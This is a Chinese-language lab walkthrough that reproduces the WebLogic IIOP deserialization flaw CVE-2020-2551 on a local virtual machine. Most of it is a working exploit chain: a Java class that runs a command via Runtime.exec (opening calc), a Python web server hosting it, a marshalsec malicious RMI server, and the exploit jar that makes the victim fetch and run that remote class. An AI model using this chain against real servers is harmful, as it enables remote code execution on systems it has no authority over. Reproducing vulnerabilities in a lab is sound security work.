0x00 前言
Weblogic IIOP 反序列化
0x01 漏洞環境
所有環境都是建立在java環境的基礎上,jdk自行下載安裝,本機環境jdk 1.8
環境1:vulub-weblogic-CVE-2017-10271
環境2:本地搭建Windows
weblogic下載
weblogic 10.3.6安裝步驟
搭建完成以後,啓動weblogic訪問如下圖所示即爲搭建成功
0x02 漏洞利用
這裏我們採用環境2在本地搭建
win7:192.168.111.18(虛擬機)
win10:192.168.2.234(本機)
工具:https://pan.baidu.com/s/1N9oW3PtJJpkGC-W-LkgW9A 提取碼:03vx
下載工具都放在同一個文件夾裏
exp.java
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
編譯生成exp.class
javac exp.java -source 1.6 -target 1.6
啓一個web服務,需要與exp.class在同一文件夾
python -m SimpleHTTPServer 80
python3 -m http.server 80
使用marshalsec起一個惡意的RMI服務
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.2.234/#exp" 1099
漏洞攻擊,成功彈出calc
java -jar weblogic_CVE_2020_2551.jar 192.168.111.18 7001 rmi://192.168.2.234:1099/exp
0x03 參考
https://xz.aliyun.com/t/7498
https://github.com/Y4er/CVE-2020-2551
https://blog.csdn.net/qq_30302577/article/details/105244654